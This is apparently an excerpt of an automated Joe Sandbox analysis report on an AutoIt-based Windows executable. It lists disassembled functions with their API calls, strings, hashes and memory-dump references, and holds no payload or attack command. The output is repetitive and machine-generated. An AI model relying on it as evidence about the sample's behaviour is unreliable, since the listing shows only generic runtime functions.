Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 6f77456fb6093839cc3c045628aa9dbbdadcd80748845558cf3974fe8d024836
Instruction ID: 60a0d772900d094694e2610eb567b40d3c12163775a78d5d236de591becce61f
Opcode Fuzzy Hash: 6f77456fb6093839cc3c045628aa9dbbdadcd80748845558cf3974fe8d024836
Instruction Fuzzy Hash: 9F31BC71900269EFDF14CFA9D94CADE3BB5FB04315F10822AF929EA2D0C7B09915DB90

Function 003EB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 003EB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 003EB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 003EB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 003EB27F
_wcsstr.LIBCMT ref: 003EB289

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: f9612654c0f42c3fbb1ea481f7059d022330ab48ecf304ef10e5f29382c92b33
Instruction ID: 0c37da844f0d236c0eeaf5802d789e5e2c9a38ffaf5aee1362c191f3aeed85be
Opcode Fuzzy Hash: f9612654c0f42c3fbb1ea481f7059d022330ab48ecf304ef10e5f29382c92b33
Instruction Fuzzy Hash: E6210731604250BBEB179B769C49EBFBB9CDF49760F018239FA04DE1A1EF61DC419260

Function 0041B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00392612: GetWindowLongW.USER32(?,000000EB), ref: 00392623

GetWindowLongW.USER32(?,000000F0), ref: 0041B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0041B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0041B1CF
GetSystemMetrics.USER32(00000004), ref: 0041B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00400E90,00000000), ref: 0041B216

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: ed80fb97977c880065717a0b072b809c20c686b69ae3d3745fde571799c3f540
Instruction ID: 7f300c0487b45368e361b8e7e8446e3532b5fe175ea88223c1100f4c57baf7f3
Opcode Fuzzy Hash: ed80fb97977c880065717a0b072b809c20c686b69ae3d3745fde571799c3f540
Instruction Fuzzy Hash: 7F218271A10651AFCB109F389C18AAA37A5EB05361F114736BD22D72E1D73498658B98

Function 003E9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E9320

Part of subcall function 00397BCC: _memmove.LIBCMT ref: 00397C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E9352
__itow.LIBCMT ref: 003E936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E9392
__itow.LIBCMT ref: 003E93A3

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: f214912ff2f5952a80f005e3a8ad0f7577d095b4fc280cea18bc6bbe95d5b316
Instruction ID: 50fcf68e48e0ff026f02514dc3c4958ef998f06724abb27a72b44818cb2d9f2a
Opcode Fuzzy Hash: f214912ff2f5952a80f005e3a8ad0f7577d095b4fc280cea18bc6bbe95d5b316
Instruction Fuzzy Hash: B3212935700258BBDB22AB669C85FEE7BACEB48710F054126FD04DB1C1D6B0CD468791

Function 00405A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00405A6E
GetForegroundWindow.USER32 ref: 00405A85
GetDC.USER32(00000000), ref: 00405AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00405ACD
ReleaseDC.USER32(00000000,00000003), ref: 00405B08

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: fa090aa1849fd3a83e9f6b173ca796e461036c31a9a05a914c6cd2e9e647dead
Instruction ID: 820fa35c6f2c28d22a1664e957555125215f4a5ef90f6e5790cd73606a448b37
Opcode Fuzzy Hash: fa090aa1849fd3a83e9f6b173ca796e461036c31a9a05a914c6cd2e9e647dead
Instruction Fuzzy Hash: 3021A135A00204AFDB04EFA9DC84AAABBE5EF48310F14C079F80997362CA74AC05CB94

Function 003912F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0039134D
SelectObject.GDI32(?,00000000), ref: 0039135C
BeginPath.GDI32(?), ref: 00391373
SelectObject.GDI32(?,00000000), ref: 0039139C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 1e2dcfce831d1f0af04b019fa87412f1382e0f34bdb8efb6f96a5642fcf5b566
Instruction ID: db097f962cbc258d2c4cc78e09776415d2e776d9d63c583c6aaa0d5208ea879c
Opcode Fuzzy Hash: 1e2dcfce831d1f0af04b019fa87412f1382e0f34bdb8efb6f96a5642fcf5b566
Instruction Fuzzy Hash: CF215E30800709EBDF12AF26DD447A97BB8EB10322F148236F811A65B2D371D9A5DF98

Function 003F4A93 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 003F4ABA
__beginthreadex.LIBCMT ref: 003F4AD8
MessageBoxW.USER32(?,?,?,?), ref: 003F4AED
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 003F4B03
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 003F4B0A

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: d3fb12dc44dbede6cea79fcc40d91bae9b74ee258a40edb8563f47a4ca066ffc
Instruction ID: 1d9754127e89589019a22c15f739b87f0ead09d82b05c0c21be0de7930e10082
Opcode Fuzzy Hash: d3fb12dc44dbede6cea79fcc40d91bae9b74ee258a40edb8563f47a4ca066ffc
Instruction Fuzzy Hash: 87110876904718BBD7028FA89C04AEB7FACEB45321F144275F914D3251D671CD048BA4

Function 003E8202 Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E821E
GetLastError.KERNEL32(?,003E7CE2,?,?,?), ref: 003E8228
GetProcessHeap.KERNEL32(00000008,?,?,003E7CE2,?,?,?), ref: 003E8237
HeapAlloc.KERNEL32(00000000,?,003E7CE2,?,?,?), ref: 003E823E
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E8255

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 3913c002b3850fbe7f5553b566e404191e3dd67606bc58ef370318fa2a359676
Instruction ID: 5e4ef1bbdfa599928f4c64ebc72b8767f138d1566b94a7d85bd93d55df1e8b92
Opcode Fuzzy Hash: 3913c002b3850fbe7f5553b566e404191e3dd67606bc58ef370318fa2a359676
Instruction Fuzzy Hash: 3F01A970600658BFDB214FA6DC48CAB7BACEF8A350B104A79F90CC2260DA318C06DA64

Function 003E710A Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?,?,003E7455), ref: 003E7127
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7142
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E7150
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?), ref: 003E7160
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,003E7044,80070057,?,?), ref: 003E716C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 338a6a1c56cdd1fb3bd1f4227502139312063e684dea6b4844af9c0bc3824787
Instruction ID: 1d4887917e9a9856b86ac2d15432394cf8230436996f1c01d2e0050a3f6d945c
Opcode Fuzzy Hash: 338a6a1c56cdd1fb3bd1f4227502139312063e684dea6b4844af9c0bc3824787
Instruction Fuzzy Hash: D201DF72600328BBCB129F65DD44BEA7BACEF44791F114274FD08D2220E731DD029BA0

Function 003F5244 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F5260
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003F526E
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F5276
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 003F5280
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 003F52BC

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: c399a4650fcbbecfb0793caf102c4187aa5df20d68915458c51125895c2b08c4
Instruction ID: ee34b68a59f471ef4e4be883230c740ee5d14ead896733fc1b2d2425c78ccc74
Opcode Fuzzy Hash: c399a4650fcbbecfb0793caf102c4187aa5df20d68915458c51125895c2b08c4
Instruction Fuzzy Hash: F2015731D01A1DEBCF01EFE4E849AEDBB78BB08311F414A66EA41B2240CB30595487A9

Function 003E810A Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003E8121
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003E812B
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E813A
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8141
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003E8157

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 35e80e65721d32746fa3802ae7bcc6fd693725feac13a6097bd2c964d07d88b3
Instruction ID: 9b2eac143ee1b36086c5c37404e491452de5dc8526237b211f5fb3a4ee0eb198
Opcode Fuzzy Hash: 35e80e65721d32746fa3802ae7bcc6fd693725feac13a6097bd2c964d07d88b3
Instruction Fuzzy Hash: 6CF06275640318BFEB120FA5EC88EA73BACFF49754B004135F949D6190CB619D46EA60

Function 003EC1E3 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 003EC1F7
GetWindowTextW.USER32(00000000,?,00000100), ref: 003EC20E
MessageBeep.USER32(00000000), ref: 003EC226
KillTimer.USER32(?,0000040A), ref: 003EC242
EndDialog.USER32(?,00000001), ref: 003EC25C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: ec00f2c8caa2f3c72ca0b4765dbb64b9dd70210ab6884f2f24acb58f76bc12af
Instruction ID: 24e59dc5ee9884a609783b69bfce8e7cd621c1214d0ce02bbe47f95f83ec9a40
Opcode Fuzzy Hash: ec00f2c8caa2f3c72ca0b4765dbb64b9dd70210ab6884f2f24acb58f76bc12af
Instruction Fuzzy Hash: 6901A230514718ABEF255B65ED4EBDA77B8BB00B06F004669A642A14E0DBE0694A8B94

Function 003913B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 003913BF
StrokeAndFillPath.GDI32(?,?,003CB888,00000000,?), ref: 003913DB
SelectObject.GDI32(?,00000000), ref: 003913EE
DeleteObject.GDI32 ref: 00391401
StrokePath.GDI32(?), ref: 0039141C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 4fad2ec79e01892929800e7cf2404e4846764f383f01a643d48fee3a9a04e585
Instruction ID: 53a0aa9b5bbee377f41a428eaf3b5fb967dc3e462ee6e15e9d42a5fc9050f173
Opcode Fuzzy Hash: 4fad2ec79e01892929800e7cf2404e4846764f383f01a643d48fee3a9a04e585
Instruction Fuzzy Hash: 8FF0CD30004B09EBDF126F16EC5C7A93FB4A715326F08C634E42A595F2C73189A6DF58

Function 003A2CFB Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 003B0DB6: std::exception::exception.LIBCMT ref: 003B0DEC
Part of subcall function 003B0DB6: __CxxThrowException@8.LIBCMT ref: 003B0E01

Part of subcall function 00397DE1: _memmove.LIBCMT ref: 00397E22

Part of subcall function 00397A51: _memmove.LIBCMT ref: 00397AAB

__swprintf.LIBCMT ref: 003A2ECD

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 003A2D66

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 6878ff2e79cbe1fc3870ac3d0fa1122f3493144ac0dfb0ee132fe320c87381e7
Instruction ID: d61e3a8f17e78d3c295783ae2db75c34d5e65d990a46f597c79ca965467c591c
Opcode Fuzzy Hash: 6878ff2e79cbe1fc3870ac3d0fa1122f3493144ac0dfb0ee132fe320c87381e7
Instruction Fuzzy Hash: 1F916E721182019FCB16EF28D886D6FB7A8EF96710F00491EF5959F2A1EB30ED44CB52

Function 003FB93B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 00394750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00394743,?,?,003937AE,?), ref: 00394770

CoInitialize.OLE32(00000000), ref: 003FB9BB
CoCreateInstance.OLE32(00422D6C,00000000,00000001,00422BDC,?), ref: 003FB9D4
CoUninitialize.OLE32 ref: 003FB9F1

Part of subcall function 00399837: __itow.LIBCMT ref: 00399862
Part of subcall function 00399837: __swprintf.LIBCMT ref: 003998AC

Strings

.lnk, xrefs: 003FB99D, 003FB9AB

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: c67ecde10baa8ebde25b66f3da4c901e8b6dbaba56bd6ef325755b773ef0f81d
Instruction ID: 25572a68af8b2a496a36320fb472da8243c732384ecf6a3142b9e486dfa24009
Opcode Fuzzy Hash: c67ecde10baa8ebde25b66f3da4c901e8b6dbaba56bd6ef325755b773ef0f81d
Instruction Fuzzy Hash: B4A153756042059FCB01EF14C880E2ABBE5FF89314F15899DF9999B3A1CB31EC46CB91

Function 003EB2F3 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 003EB4BE

Strings

%B, xrefs: 003EB561
Container, xrefs: 003EB43B
AutoIt3GUI, xrefs: 003EB436

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container$%B
API String ID: 3565006973-1790175466
Opcode ID: 3e412fb80122e5c65fb4d68e40874a6ccbd5f1e83056586425b607c16178249f
Instruction ID: ecebba2c73d3fe4e7d8cd24984593cfe52af693e569a68727f5b9ffd7d2d4547
Opcode Fuzzy Hash: 3e412fb80122e5c65fb4d68e40874a6ccbd5f1e83056586425b607c16178249f
Instruction Fuzzy Hash: 3B915970200611AFDB16DF65C885B6BBBE9FF49700F20866EE94ACB6D1DB70E841CB50

Function 003B501D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 003B50AD

Part of subcall function 003C00F0: __87except.LIBCMT ref: 003C012B

Strings

pow, xrefs: 003B5085, 003B50A2

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394403279.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394421863.0000000000457000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_390000_5by4QM3v89.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: cd10dd50b7a1ca53286419a517f45df94b31e9ceac96ae6ac60fcd5b334df76e
Instruction ID: f73823036a2bdbdcd07ba0e3f82c3b4a6b4147784c95bdff216aa5b2f9c2209b
Opcode Fuzzy Hash: cd10dd50b7a1ca53286419a517f45df94b31e9ceac96ae6ac60fcd5b334df76e
Instruction Fuzzy Hash: F351AE71A0C641C7DB2B7B28CC057BE6B949B00304F248D6CE5D5C66A9DF348DC49B86

Function 003D8584 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 003D862B
_memmove.LIBCMT ref: 003D8685

Strings

_:, xrefs: 003D86FF, 003DDFDC, 003DDFF8
3c:, xrefs: 003D860C

Memory Dump Source

Source File: 00000000.00000002.1394307595.0000000000391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true

Associated: 00000000.00000002.1394290870.0000000000390000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1394356903.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
